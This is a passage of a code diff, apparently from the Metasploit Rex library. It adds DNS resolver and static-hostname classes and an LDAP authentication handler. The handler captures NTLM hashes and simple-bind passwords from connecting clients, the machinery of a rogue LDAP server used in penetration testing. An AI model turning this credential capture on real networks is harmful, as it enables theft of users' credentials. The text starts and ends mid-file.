simple_name_lookup(upstream_resolver, packet, type, cls) do |name, _family|
|
||||
static_hostnames.get(name, type)
|
||||
end
|
||||
end
|
||||
|
||||
def resolve_via_system(upstream_resolver, packet, type, cls)
|
||||
# This system resolver will use host operating systems `getaddrinfo` (or equivalent function) to perform name
|
||||
# resolution. This is primarily useful if that functionality is hooked or modified by an external application such
|
||||
# as proxychains. This handler though can only process A and AAAA requests.
|
||||
simple_name_lookup(upstream_resolver, packet, type, cls) do |name, family|
|
||||
addrinfos = ::Addrinfo.getaddrinfo(name, 0, family, ::Socket::SOCK_STREAM)
|
||||
addrinfos.map(&:ip_address)
|
||||
end
|
||||
end
|
||||
|
||||
def simple_name_lookup(upstream_resolver, packet, type, cls, &block)
|
||||
return nil unless cls == Dnsruby::Classes::IN
|
||||
|
||||
# todo: make sure this will work if the packet has multiple questions, figure out how that's handled
|
||||
name = packet.question.first.qname.to_s
|
||||
case type
|
||||
when Dnsruby::Types::A
|
||||
family = ::Socket::AF_INET
|
||||
when Dnsruby::Types::AAAA
|
||||
family = ::Socket::AF_INET6
|
||||
else
|
||||
return nil
|
||||
end
|
||||
|
||||
ip_addresses = nil
|
||||
begin
|
||||
ip_addresses = block.call(name, family)
|
||||
rescue StandardError => e
|
||||
@logger.error("The #{upstream_resolver.type} name lookup block failed for #{name}")
|
||||
end
|
||||
return nil unless ip_addresses && !ip_addresses.empty?
|
||||
|
||||
message = Dnsruby::Message.new
|
||||
message.add_question(name, type, cls)
|
||||
ip_addresses.each do |ip_address|
|
||||
message.add_answer(Dnsruby::RR.new_from_hash(
|
||||
name: name,
|
||||
type: type,
|
||||
ttl: 0,
|
||||
address: ip_address.to_s
|
||||
))
|
||||
end
|
||||
[message.encode]
|
||||
end
|
||||
|
||||
def supports_udp?(upstream_resolver)
|
||||
return false unless upstream_resolver.type == UpstreamResolver::Type::DNS_SERVER
|
||||
|
||||
comm = upstream_resolver.socket_options.fetch('Comm') { @config[:comm] || Rex::Socket::SwitchBoard.best_comm(upstream_resolver.destination) }
|
||||
return false if comm && !comm.supports_udp?
|
||||
|
||||
true
|
||||
end
|
||||
end # Resolver
|
||||
|
||||
@@ -0,0 +1,151 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
require 'rex/socket'
|
||||
require 'forwardable'
|
||||
|
||||
module Rex
|
||||
module Proto
|
||||
module DNS
|
||||
##
|
||||
# This class manages statically defined hostnames for DNS resolution where each name is a mapping to an IPv4 and or
|
||||
# an IPv6 address. A single hostname can only map to one address of each family.
|
||||
##
|
||||
class StaticHostnames
|
||||
extend Forwardable
|
||||
|
||||
def_delegators :@hostnames, :each, :each_with_index, :length, :empty?
|
||||
|
||||
# @param [Hash<String, IPAddr>] hostnames The hostnames to IP address mappings to initialize with.
|
||||
def initialize(hostnames: nil)
|
||||
@hostnames = {}
|
||||
if hostnames
|
||||
hostnames.each do |hostname, ip_address|
|
||||
add(hostname, ip_address)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
# Locate and parse a hosts file on the system. Only the first hostname to IP address definition is used which
|
||||
# replicates the behavior of /etc/hosts on Linux. Loaded definitions are merged with existing definitions.
|
||||
def parse_hosts_file
|
||||
path = %w[
|
||||
%WINDIR%\system32\drivers\etc\hosts
|
||||
/etc/hosts
|
||||
/data/data/com.termux/files/usr/etc/hosts
|
||||
].find do |path|
|
||||
path = File.expand_path(path)
|
||||
File.file?(path) && File.readable?(path)
|
||||
end
|
||||
return unless path
|
||||
|
||||
path = File.expand_path(path)
|
||||
::IO.foreach(path) do |line|
|
||||
words = line.split
|
||||
next unless words.length > 1 && Rex::Socket.is_ip_addr?(words.first)
|
||||
|
||||
ip_address = IPAddr.new(words.shift)
|
||||
words.each do |hostname|
|
||||
add(hostname, ip_address)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
# Get an IP address of the specified type for the hostname. Only the first address is returned in cases where
|
||||
# multiple addresses are defined.
|
||||
#
|
||||
# @param [String] hostname The hostname to retrieve an address for.
|
||||
# @param [Integer] type The family of address to return represented as a DNS type (either A or AAAA).
|
||||
# @return Returns the IP address if it was found, otherwise nil.
|
||||
# @rtype [IPAddr, nil]
|
||||
def get1(hostname, type = Dnsruby::Types::A)
|
||||
get(hostname, type).first
|
||||
end
|
||||
|
||||
# Get all IP addresses of the specified type for the hostname.
|
||||
#
|
||||
# @param [String] hostname The hostname to retrieve an address for.
|
||||
# @param [Integer] type The family of address to return represented as a DNS type (either A or AAAA).
|
||||
# @return Returns an array of IP addresses.
|
||||
# @rtype [Array<IPAddr>]
|
||||
def get(hostname, type = Dnsruby::Types::A)
|
||||
hostname = hostname.downcase
|
||||
@hostnames.fetch(hostname, {}).fetch(type, []).dup
|
||||
end
|
||||
|
||||
# Add an IP address for the specified hostname.
|
||||
#
|
||||
# @param [String] hostname The hostname whose IP address is being defined.
|
||||
# @param [IPAddr, String] ip_address The IP address that is being defined for the hostname. If this value is a
|
||||
# string, it will be converted to an IPAddr instance.
|
||||
def add(hostname, ip_address)
|
||||
unless self.class.is_valid_hostname?(hostname)
|
||||
# it is important to validate the hostname because assumptions about what characters it may contain are made
|
||||
# when saving and loading it from the configuration
|
||||
raise ::ArgumentError.new("Invalid hostname: #{hostname}")
|
||||
end
|
||||
|
||||
ip_address = IPAddr.new(ip_address) if ip_address.is_a?(String) && Rex::Socket.is_ip_addr?(ip_address)
|
||||
|
||||
hostname = hostname.downcase
|
||||
this_host = @hostnames.fetch(hostname, {})
|
||||
if ip_address.family == ::Socket::AF_INET
|
||||
type = Dnsruby::Types::A
|
||||
else
|
||||
type = Dnsruby::Types::AAAA
|
||||
end
|
||||
this_type = this_host.fetch(type, [])
|
||||
this_type << ip_address unless this_type.include?(ip_address)
|
||||
this_host[type] = this_type
|
||||
@hostnames[hostname] = this_host
|
||||
nil
|
||||
end
|
||||
|
||||
# Delete an IP address for the specified hostname.
|
||||
#
|
||||
# @param [String] hostname The hostname whose IP address is being undefined.
|
||||
# @param [IPAddr, String] ip_address The IP address that is being undefined. If this value is a string, it will be
|
||||
# converted to an IPAddr instance.
|
||||
def delete(hostname, ip_address)
|
||||
ip_address = IPAddr.new(ip_address) if ip_address.is_a?(String) && Rex::Socket.is_ip_addr?(ip_address)
|
||||
if ip_address.family == ::Socket::AF_INET
|
||||
type = Dnsruby::Types::A
|
||||
else
|
||||
type = Dnsruby::Types::AAAA
|
||||
end
|
||||
|
||||
hostname = hostname.downcase
|
||||
this_host = @hostnames.fetch(hostname, {})
|
||||
this_type = this_host.fetch(type, [])
|
||||
this_type.delete(ip_address)
|
||||
if this_type.empty?
|
||||
this_host.delete(type)
|
||||
else
|
||||
this_host[type] = this_type
|
||||
end
|
||||
if this_host.empty?
|
||||
@hostnames.delete(hostname)
|
||||
else
|
||||
@hostnames[hostname] = this_host
|
||||
end
|
||||
|
||||
nil
|
||||
end
|
||||
|
||||
# Delete all hostname to IP address definitions.
|
||||
def flush
|
||||
@hostnames.clear
|
||||
end
|
||||
|
||||
def self.is_valid_hostname?(name)
|
||||
# check if it appears to be a fully qualified domain name, e.g. www.metasploit.com
|
||||
return true if Rex::Socket.is_name?(name)
|
||||
|
||||
# check if it appears to at least be a valid hostname, e.g. localhost
|
||||
return true if (name =~ /^([a-z0-9][a-z0-9\-]{0,61})?[a-z0-9]$/i) && (name =~ /\s/).nil?
|
||||
|
||||
false
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
@@ -0,0 +1,76 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
module Rex
|
||||
module Proto
|
||||
module DNS
|
||||
##
|
||||
# This represents a single upstream DNS resolver target of one of the predefined types.
|
||||
##
|
||||
class UpstreamResolver
|
||||
module Type
|
||||
BLACK_HOLE = :"black-hole"
|
||||
DNS_SERVER = :"dns-server"
|
||||
STATIC = :static
|
||||
SYSTEM = :system
|
||||
end
|
||||
|
||||
attr_reader :type, :destination, :socket_options
|
||||
|
||||
# @param [Symbol] type The resolver type.
|
||||
# @param [String] destination An optional destination, as used by some resolver types.
|
||||
# @param [Hash] socket_options Options to use for sockets when connecting to the destination, as used by some
|
||||
# resolver types.
|
||||
def initialize(type, destination: nil, socket_options: {})
|
||||
@type = type
|
||||
@destination = destination
|
||||
@socket_options = socket_options
|
||||
end
|
||||
|
||||
# Initialize a new black-hole resolver.
|
||||
def self.create_black_hole
|
||||
self.new(Type::BLACK_HOLE)
|
||||
end
|
||||
|
||||
# Initialize a new dns-server resolver.
|
||||
#
|
||||
# @param [String] destination The IP address of the upstream DNS server.
|
||||
# @param [Hash] socket_options Options to use when connecting to the upstream DNS server.
|
||||
def self.create_dns_server(destination, socket_options: {})
|
||||
self.new(
|
||||
Type::DNS_SERVER,
|
||||
destination: destination,
|
||||
socket_options: socket_options
|
||||
)
|
||||
end
|
||||
|
||||
# Initialize a new static resolver.
|
||||
def self.create_static
|
||||
self.new(Type::STATIC)
|
||||
end
|
||||
|
||||
# Initialize a new system resolver.
|
||||
def self.create_system
|
||||
self.new(Type::SYSTEM)
|
||||
end
|
||||
|
||||
def to_s
|
||||
if type == Type::DNS_SERVER
|
||||
destination.to_s
|
||||
else
|
||||
type.to_s
|
||||
end
|
||||
end
|
||||
|
||||
def eql?(other)
|
||||
return false unless other.is_a?(self.class)
|
||||
return false unless other.type == type
|
||||
return false unless other.destination == destination
|
||||
return false unless other.socket_options == socket_options
|
||||
true
|
||||
end
|
||||
|
||||
alias == eql?
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
@@ -0,0 +1,104 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
require 'json'
|
||||
require 'rex/socket'
|
||||
|
||||
module Rex
|
||||
module Proto
|
||||
module DNS
|
||||
##
|
||||
# This represents a configuration rule for how names should be resolved. It matches a single wildcard which acts as a
|
||||
# matching condition and maps it to 0 or more resolvers to use for lookups.
|
||||
##
|
||||
class UpstreamRule
|
||||
|
||||
attr_reader :wildcard, :resolvers, :comm
|
||||
# @param [String] wildcard The wildcard pattern to use for conditionally matching hostnames.
|
||||
# @param [Array] resolvers The resolvers to use when this rule is applied.
|
||||
# @param [Msf::Session::Comm] comm The communication channel to use when creating network connections.
|
||||
def initialize(wildcard: '*', resolvers: [], comm: nil)
|
||||
::ArgumentError.new("Invalid wildcard text: #{wildcard}") unless self.class.valid_wildcard?(wildcard)
|
||||
@wildcard = wildcard
|
||||
socket_options = {}
|
||||
socket_options['Comm'] = comm unless comm.nil?
|
||||
@resolvers = resolvers.map do |resolver|
|
||||
if resolver.is_a?(String) && !Rex::Socket.is_ip_addr?(resolver)
|
||||
resolver = resolver.downcase.to_sym
|
||||
end
|
||||
|
||||
case resolver
|
||||
when UpstreamResolver
|
||||
resolver
|
||||
when UpstreamResolver::Type::BLACK_HOLE
|
||||
UpstreamResolver.create_black_hole
|
||||
when UpstreamResolver::Type::STATIC
|
||||
UpstreamResolver.create_static
|
||||
when UpstreamResolver::Type::SYSTEM
|
||||
UpstreamResolver.create_system
|
||||
else
|
||||
if Rex::Socket.is_ip_addr?(resolver)
|
||||
UpstreamResolver.create_dns_server(resolver, socket_options: socket_options)
|
||||
else
|
||||
raise ::ArgumentError.new("Invalid upstream DNS resolver: #{resolver}")
|
||||
end
|
||||
end
|
||||
end
|
||||
@comm = comm
|
||||
end
|
||||
|
||||
# Check whether or not the defined resolver is valid.
|
||||
#
|
||||
# @param [String] resolver The resolver string to check.
|
||||
# @rtype Boolean
|
||||
def self.valid_resolver?(resolver)
|
||||
return true if Rex::Socket.is_ip_addr?(resolver)
|
||||
|
||||
resolver = resolver.downcase.to_sym
|
||||
[
|
||||
UpstreamResolver::Type::BLACK_HOLE,
|
||||
UpstreamResolver::Type::STATIC,
|
||||
UpstreamResolver::Type::SYSTEM
|
||||
].include?(resolver)
|
||||
end
|
||||
|
||||
# Check whether or not the defined wildcard is a valid pattern.
|
||||
#
|
||||
# @param [String] wildcard The wildcard text to check.
|
||||
# @rtype Boolean
|
||||
def self.valid_wildcard?(wildcard)
|
||||
wildcard == '*' || wildcard =~ /^(\*\.)?([a-z\d][a-z\d-]*[a-z\d]\.)+[a-z]+$/
|
||||
end
|
||||
|
||||
# Check whether or not the currently configured wildcard pattern will match all names.
|
||||
#
|
||||
# @rtype Boolean
|
||||
def matches_all?
|
||||
wildcard == '*'
|
||||
end
|
||||
|
||||
# Check whether or not the specified name matches the currently configured wildcard pattern.
|
||||
#
|
||||
# @rtype Boolean
|
||||
def matches_name?(name)
|
||||
if matches_all?
|
||||
true
|
||||
elsif wildcard.start_with?('*.')
|
||||
name.downcase.end_with?(wildcard[1..-1].downcase)
|
||||
else
|
||||
name.casecmp?(wildcard)
|
||||
end
|
||||
end
|
||||
|
||||
def eql?(other)
|
||||
return false unless other.is_a?(self.class)
|
||||
return false unless other.wildcard == wildcard
|
||||
return false unless other.resolvers == resolvers
|
||||
return false unless other.comm == comm
|
||||
true
|
||||
end
|
||||
|
||||
alias == eql?
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
@@ -0,0 +1,342 @@
|
||||
require 'net/ldap'
|
||||
require 'net/ldap/dn'
|
||||
|
||||
module Rex
|
||||
module Proto
|
||||
module LDAP
|
||||
class Auth
|
||||
SUPPORTS_SASL = %w[GSS-SPNEGO NLTM]
|
||||
NTLM_CONST = Rex::Proto::NTLM::Constants
|
||||
NTLM_CRYPT = Rex::Proto::NTLM::Crypt
|
||||
MESSAGE = Rex::Proto::NTLM::Message
|
||||
|
||||
#
|
||||
# Initialize the required variables
|
||||
#
|
||||
# @param challenge [String] NTLM Server Challenge
|
||||
# @param domain [String] Domain value used in NTLM
|
||||
# @param server [String] Server value used in NTLM
|
||||
# @param dnsname [String] DNS Name value used in NTLM
|
||||
# @param dnsdomain [String] DNS Domain value used in NTLM
|
||||
def initialize(challenge, domain, server, dnsname, dnsdomain)
|
||||
@domain = domain.nil? ? 'DOMAIN' : domain
|
||||
@server = server.nil? ? 'SERVER' : server
|
||||
@dnsname = dnsname.nil? ? 'server' : dnsname
|
||||
@dnsdomain = dnsdomain.nil? ? 'example.com' : dnsdomain
|
||||
@challenge = [challenge.nil? ? Rex::Text.rand_text_alphanumeric(16) : challenge].pack('H*')
|
||||
end
|
||||
|
||||
#
|
||||
# Process the incoming LDAP login requests from clients
|
||||
#
|
||||
# @param user_login [OpenStruct] User login information
|
||||
#
|
||||
# @return auth_info [Hash] Processed authentication information
|
||||
def process_login_request(user_login)
|
||||
auth_info = {}
|
||||
|
||||
if user_login.name.empty? && user_login.authentication.empty? # Anonymous
|
||||
auth_info = handle_anonymous_request(user_login, auth_info)
|
||||
elsif !user_login.name.empty? # Simple
|
||||
auth_info = handle_simple_request(user_login, auth_info)
|
||||
elsif sasl?(user_login)
|
||||
auth_info = handle_sasl_request(user_login, auth_info)
|
||||
else
|
||||
auth_info = handle_unknown_request(user_login, auth_info)
|
||||
end
|
||||
|
||||
auth_info
|
||||
end
|
||||
|
||||
#
|
||||
# Handle Anonymous authentication requests
|
||||
#
|
||||
# @param user_login [OpenStruct] User login information
|
||||
# @param auth_info [Hash] Processed authentication information
|
||||
#
|
||||
# @return auth_info [Hash] Processed authentication information
|
||||
def handle_anonymous_request(user_login, auth_info = {})
|
||||
if user_login.name.empty? && user_login.authentication.empty?
|
||||
auth_info[:user] = user_login.name
|
||||
auth_info[:pass] = user_login.authentication
|
||||
auth_info[:domain] = nil
|
||||
auth_info[:result_code] = Net::LDAP::ResultCodeSuccess
|
||||
auth_info[:auth_type] = 'Anonymous'
|
||||
end
|
||||
auth_info
|
||||
end
|
||||
|
||||
#
|
||||
# Handle Unknown authentication requests
|
||||
#
|
||||
# @param user_login [OpenStruct] User login information
|
||||
# @param auth_info [Hash] Processed authentication information
|
||||
#
|
||||
# @return auth_info [Hash] Processed authentication information
|
||||
def handle_unknown_request(user_login, auth_info = {})
|
||||
auth_info[:result_code] = Net::LDAP::ResultCodeAuthMethodNotSupported
|
||||
auth_info[:error_msg] = 'Invalid LDAP Login Attempt => Unknown Authentication Format'
|
||||
auth_info
|
||||
end
|
||||
|
||||
#
|
||||
# Handle Simple authentication requests
|
||||
#
|
||||
# @param user_login [OpenStruct] User login information
|
||||
# @param auth_info [Hash] Processed authentication information
|
||||
#
|
||||
# @return auth_info [Hash] Processed authentication information
|
||||
def handle_simple_request(user_login, auth_info = {})
|
||||
domains = []
|
||||
names = []
|
||||
if !user_login.name.empty?
|
||||
if user_login.name =~ /@/
|
||||
pub_info = user_login.name.split('@')
|
||||
if pub_info.length <= 2
|
||||
auth_info[:user], auth_info[:domain] = pub_info
|
||||
else
|
||||
auth_info[:result_code] = Net::LDAP::ResultCodeInvalidCredentials
|
||||
auth_info[:error_msg] = "Invalid LDAP Login Attempt => DN:#{user_login.name}"
|
||||
end
|
||||
elsif user_login.name =~ /,/
|
||||
begin
|
||||
dn = Net::LDAP::DN.new(user_login.name)
|
||||
dn.each_pair do |key, value|
|
||||
if key == 'cn'
|
||||
names << value
|
||||
elsif key == 'dc'
|
||||
domains << value
|
||||
end
|
||||
end
|
||||
auth_info[:user] = names.join('')
|
||||
auth_info[:domain] = domains.empty? ? nil : domains.join('.')
|
||||
rescue Net::LDAP::InvalidDNError => e
|
||||
auth_info[:error_msg] = "Invalid LDAP Login Attempt => DN:#{user_login.name}"
|
||||
raise e
|
||||
end
|
||||
elsif user_login.name =~ /\\/
|
||||
pub_info = user_login.name.split('\\')
|
||||
if pub_info.length <= 2
|
||||
auth_info[:domain], auth_info[:user] = pub_info
|
||||
else
|
||||
auth_info[:result_code] = Net::LDAP::ResultCodeInvalidCredentials
|
||||
auth_info[:error_msg] = "Invalid LDAP Login Attempt => DN:#{user_login.name}"
|
||||
end
|
||||
else
|
||||
auth_info[:user] = user_login.name
|
||||
auth_info[:domain] = nil
|
||||
auth_info[:result_code] = Net::LDAP::ResultCodeInvalidCredentials
|
||||
end
|
||||
auth_info[:private] = user_login.authentication
|
||||
auth_info[:private_type] = :password
|
||||
auth_info[:result_code] = Net::LDAP::ResultCodeAuthMethodNotSupported if auth_info[:result_code].nil?
|
||||
auth_info[:auth_type] = 'Simple'
|
||||
auth_info
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Handle SASL authentication requests
|
||||
#
|
||||
# @param user_login [OpenStruct] User login information
|
||||
# @param auth_info [Hash] Processed authentication information
|
||||
#
|
||||
# @return auth_info [Hash] Processed authentication information
|
||||
def handle_sasl_request(user_login, auth_info = {})
|
||||
case user_login.authentication[1]
|
||||
when /NTLMSSP/
|
||||
message = Net::NTLM::Message.parse(user_login.authentication[1])
|
||||
if message.is_a?(::Net::NTLM::Message::Type1)
|
||||
auth_info[:server_creds] = generate_type2_response(message)
|
||||
auth_info[:result_code] = Net::LDAP::ResultCodeSaslBindInProgress
|
||||
elsif message.is_a?(::Net::NTLM::Message::Type3)
|
||||
auth_info = handle_type3_message(message, auth_info)
|
||||
auth_info[:result_code] = Net::LDAP::ResultCodeAuthMethodNotSupported
|
||||
end
|
||||
else
|
||||
auth_info[:result_code] = Net::LDAP::ResultCodeAuthMethodNotSupported
|
||||
auth_info[:error_msg] = 'Invalid LDAP Login Attempt => Unsupported SASL Format'
|
||||
end
|
||||
auth_info[:auth_type] = 'SASL'
|
||||
auth_info
|
||||
end
|
||||
|
||||
private
|
||||
|
||||
#
|
||||
# Determine if the supplied request is formatted for SASL auth
|
||||
#
|
||||
# @param user_login [OpenStruct] User login information
|
||||
#
|
||||
# @return [bool] True if the request can be processed for SASL auth
|
||||
def sasl?(user_login)
|
||||
if user_login.authentication.is_a?(Array) && SUPPORTS_SASL.include?(user_login.authentication[0])
|
||||
return true
|
||||
end
|
||||
|
||||
false
|
||||
end
|
||||
|
||||
#
|
||||
# Generate NTLM Type2 response from NTLM Type1 message
|
||||
#
|
||||
# @param message [Net::NTLM::Message::Type1] NTLM Type1 message
|
||||
#
|
||||
# @return server_hash [String] NTLM Type2 response that is sent as server credentials
|
||||
def generate_type2_response(message)
|
||||
dom = message.domain
|
||||
ws = message.workstation
|
||||
domain = dom.empty? ? @domain : dom
|
||||
server = ws.empty? ? @server : ws
|
||||
server_hash = MESSAGE.process_type1_message(message.encode64, @challenge, domain, server, @dnsname, @dnsdomain)
|
||||
Rex::Text.decode_base64(server_hash)
|
||||
end
|
||||
|
||||
#
|
||||
# Handle NTLM Type3 message
|
||||
#
|
||||
# @param message [Net::NTLM::Message::Type3] NTLM Type3 message
|
||||
# @param auth_info [Hash] Processed authentication information
|
||||
#
|
||||
# @return auth_info [Hash] Processed authentication information
|
||||
def handle_type3_message(message, auth_info = {})
|
||||
arg = {
|
||||
domain: message.domain,
|
||||
user: message.user,
|
||||
host: message.workstation
|
||||
}
|
||||
|
||||
domain, user, host, lm_hash, ntlm_hash = MESSAGE.process_type3_message(message.encode64)
|
||||
nt_len = ntlm_hash.length
|
||||
|
||||
if nt_len == 48
|
||||
arg[:ntlm_ver] = NTLM_CONST::NTLM_V1_RESPONSE
|
||||
arg[:lm_hash] = lm_hash
|
||||
arg[:nt_hash] = ntlm_hash
|
||||
|
||||
if arg[:lm_hash][16, 32] == '0' * 32
|
||||
arg[:ntlm_ver] = NTLM_CONST::NTLM_2_SESSION_RESPONSE
|
||||
end
|
||||
elsif nt_len > 48
|
||||
arg[:ntlm_ver] = NTLM_CONST::NTLM_V2_RESPONSE
|
||||
arg[:lm_hash] = lm_hash[0, 32]
|
||||
arg[:lm_cli_challenge] = lm_hash[32, 16]
|
||||
arg[:nt_hash] = ntlm_hash[0, 32]
|
||||
arg[:nt_cli_challenge] = ntlm_hash[32, nt_len - 32]
|
||||
else
|
||||
auth_info[:error_msg] = "Unknown hash type from #{host}, ignoring ..."
|
||||
end
|
||||
auth_info.merge(process_ntlm_hash(arg)) unless arg.nil?
|
||||
end
|
||||
|
||||
#
|
||||
# Process the NTLM Hash received from NTLM Type3 message
|
||||
#
|
||||
# @param arg [Hash] authentication information received from Type3 message
|
||||
#
|
||||
# @return arg [Hash] Processed NTLM authentication information
|
||||
def process_ntlm_hash(arg = {})
|
||||
ntlm_ver = arg[:ntlm_ver]
|
||||
lm_hash = arg[:lm_hash]
|
||||
nt_hash = arg[:nt_hash]
|
||||
unless ntlm_ver == NTLM_CONST::NTLM_V1_RESPONSE || ntlm_ver == NTLM_CONST::NTLM_2_SESSION_RESPONSE
|
||||
lm_cli_challenge = arg[:lm_cli_challenge]
|
||||
nt_cli_challenge = arg[:nt_cli_challenge]
|
||||
end
|
||||
domain = Rex::Text.to_ascii(arg[:domain])
|
||||
user = Rex::Text.to_ascii(arg[:user])
|
||||
host = Rex::Text.to_ascii(arg[:host])
|
||||
|
||||
case ntlm_ver
|
||||
when NTLM_CONST::NTLM_V1_RESPONSE
|
||||
if NTLM_CRYPT.is_hash_from_empty_pwd?({
|
||||
hash: [nt_hash].pack('H*'),
|
||||
srv_challenge: @challenge,
|
||||
ntlm_ver: NTLM_CONST::NTLM_V1_RESPONSE,
|
||||
type: 'ntlm'
|
||||
})
|
||||
arg[:error_msg] = 'NLMv1 Hash correspond to an empty password, ignoring ... '
|
||||
return
|
||||
end
|
||||
if lm_hash == nt_hash || lm_hash == '' || lm_hash =~ /^0*$/
|
||||
lm_hash_message = 'Disabled'
|
||||
elsif NTLM_CRYPT.is_hash_from_empty_pwd?({
|
||||
hash: [lm_hash].pack('H*'),
|
||||
srv_challenge: @challenge,
|
||||
ntlm_ver: NTLM_CONST::NTLM_V1_RESPONSE,
|
||||
type: 'lm'
|
||||
})
|
||||
lm_hash_message = 'Disabled (from empty password)'
|
||||
else
|
||||
lm_hash_message = lm_hash
|
||||
end
|
||||
|
||||
hash = [
|
||||
lm_hash || '0' * 48,
|
||||
nt_hash || '0' * 48
|
||||
].join(':').gsub(/\n/, '\\n')
|
||||
arg[:private] = hash
|
||||
when NTLM_CONST::NTLM_V2_RESPONSE
|
||||
if NTLM_CRYPT.is_hash_from_empty_pwd?({
|
||||
hash: [nt_hash].pack('H*'),
|
||||
srv_challenge: @challenge,
|
||||
cli_challenge: [nt_cli_challenge].pack('H*'),
|
||||
user: user,
|
||||
domain: domain,
|
||||
ntlm_ver: NTLM_CONST::NTLM_V2_RESPONSE,
|
||||
type: 'ntlm'
|
||||
})
|
||||
arg[:error_msg] = 'NTLMv2 Hash correspond to an empty password, ignoring ... '
|
||||
return
|
||||
end
|
||||
if (lm_hash == '0' * 32) && (lm_cli_challenge == '0' * 16)
|
||||
lm_hash_message = 'Disabled'
|
||||
elsif NTLM_CRYPT.is_hash_from_empty_pwd?({
|
||||
hash: [lm_hash].pack('H*'),
|
||||
srv_challenge: @challenge,
|
||||
cli_challenge: [lm_cli_challenge].pack('H*'),
|
||||
user: user,
|
||||
domain: domain,
|
||||
ntlm_ver: NTLM_CONST::NTLM_V2_RESPONSE,
|
||||
type: 'lm'
|
||||
})
|
||||
lm_hash_message = 'Disabled (from empty password)'
|
||||
else
|
||||
lm_hash_message = lm_hash
|
||||
end
|
||||
|
||||
hash = [
|
||||
lm_hash || '0' * 32,
|
||||
nt_hash || '0' * 32
|
||||
].join(':').gsub(/\n/, '\\n')
|
||||
arg[:private] = hash
|
||||
when NTLM_CONST::NTLM_2_SESSION_RESPONSE
|
||||
if NTLM_CRYPT.is_hash_from_empty_pwd?({
|
||||
hash: [nt_hash].pack('H*'),
|
||||
srv_challenge: @challenge,
|
||||
cli_challenge: [lm_hash].pack('H*')[0, 8],
|
||||
ntlm_ver: NTLM_CONST::NTLM_2_SESSION_RESPONSE,
|
||||
type: 'ntlm'
|
||||
})
|
||||
arg[:error_msg] = 'NTLM2_session Hash correspond to an empty password, ignoring ... '
|
||||
return
|
||||
end
|
||||
|
||||
hash = [
|
||||
lm_hash || '0' * 48,
|
||||
nt_hash || '0' * 48
|
||||
].join(':').gsub(/\n/, '\\n')
|
||||
arg[:private] = hash
|
||||
else
|
||||
return
|
||||
end
|
||||
arg[:domain] = domain
|
||||
arg[:user] = user
|
||||
arg[:host] = host
|
||||
arg[:private_type] = :ntlm_hash
|
||||
arg
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
+166
-70
@@ -56,12 +56,13 @@ module Rex
|
||||
# @param udp [TrueClass, FalseClass] Listen on UDP socket
|
||||
# @param tcp [TrueClass, FalseClass] Listen on TCP socket
|
||||
# @param ldif [String] LDIF data
|
||||
# @param auth_provider [Rex::Proto::LDAP::Auth] LDAP Authentication provider which processes authentication
|
||||
# @param ctx [Hash] Framework context for sockets
|
||||
# @param dblock [Proc] Handler for :dispatch_request flow control interception
|
||||
# @param sblock [Proc] Handler for :send_response flow control interception
|
||||
#
|
||||
# @return [Rex::Proto::LDAP::Server] LDAP Server object
|
||||
def initialize(lhost = '0.0.0.0', lport = 389, udp = true, tcp = true, ldif = nil, comm = nil, ctx = {}, dblock = nil, sblock = nil)
|
||||
def initialize(lhost = '0.0.0.0', lport = 389, udp = true, tcp = true, ldif = nil, comm = nil, auth_provider = nil, ctx = {}, dblock = nil, sblock = nil)
|
||||
@serve_udp = udp
|
||||
@serve_tcp = tcp
|
||||
@sock_options = {
|
||||
@@ -74,6 +75,7 @@ module Rex
|
||||
self.listener_thread = nil
|
||||
self.dispatch_request_proc = dblock
|
||||
self.send_response_proc = sblock
|
||||
@auth_provider = auth_provider
|
||||
end
|
||||
|
||||
#
|
||||
@@ -109,11 +111,13 @@ module Rex
|
||||
stop
|
||||
raise e
|
||||
end
|
||||
if !serve_udp
|
||||
unless serve_udp
|
||||
self.listener_thread = tcp_sock.listener_thread
|
||||
end
|
||||
end
|
||||
|
||||
@auth_provider ||= Rex::Proto::LDAP::Auth.new(nil, nil, nil, nil, nil)
|
||||
|
||||
self
|
||||
end
|
||||
|
||||
@@ -149,53 +153,90 @@ module Rex
|
||||
#
|
||||
# Default LDAP request dispatcher
|
||||
#
|
||||
# @param cli [Rex::Socket::Tcp, Rex::Socket::Udp] Client sending the request
|
||||
# @param client [Rex::Socket::Tcp, Rex::Socket::Udp] Client sending the request
|
||||
# @param data [String] raw LDAP request data
|
||||
def default_dispatch_request(cli, data)
|
||||
return if data.strip.empty?
|
||||
def default_dispatch_request(client, data)
|
||||
return if data.strip.empty? || data.strip.nil?
|
||||
|
||||
processed_pdu_data = {
|
||||
ip: client.peerhost,
|
||||
port: client.peerport,
|
||||
service_name: 'ldap',
|
||||
post_pdu: false
|
||||
}
|
||||
|
||||
data.extend(Net::BER::Extensions::String)
|
||||
begin
|
||||
pdu = Net::LDAP::PDU.new(data.read_ber!(Net::LDAP::AsnSyntax))
|
||||
wlog("LDAP request has remaining data: #{data}") if !data.empty?
|
||||
resp = case pdu.app_tag
|
||||
when Net::LDAP::PDU::BindRequest # bind request
|
||||
cli.authenticated = true
|
||||
encode_ldap_response(
|
||||
pdu.message_id,
|
||||
Net::LDAP::ResultCodeSuccess,
|
||||
'',
|
||||
'',
|
||||
Net::LDAP::PDU::BindResult
|
||||
)
|
||||
when Net::LDAP::PDU::SearchRequest # search request
|
||||
if cli.authenticated
|
||||
# Perform query against some loaded LDIF structure
|
||||
treebase = pdu.search_parameters[:base_object].to_s
|
||||
# ... search, build packet, send to client
|
||||
encode_ldap_response(
|
||||
pdu.message_id,
|
||||
Net::LDAP::ResultCodeNoSuchObject, '',
|
||||
Net::LDAP::ResultStrings[Net::LDAP::ResultCodeNoSuchObject],
|
||||
Net::LDAP::PDU::SearchResult
|
||||
)
|
||||
else
|
||||
service.encode_ldap_response(pdu.message_id, 50, '', 'Not authenticated', Net::LDAP::PDU::SearchResult)
|
||||
end
|
||||
when Net::LDAP::PDU::UnbindRequest
|
||||
nil # close client, no response can be sent over unbound comm
|
||||
else
|
||||
service.encode_ldap_response(
|
||||
pdu.message_id,
|
||||
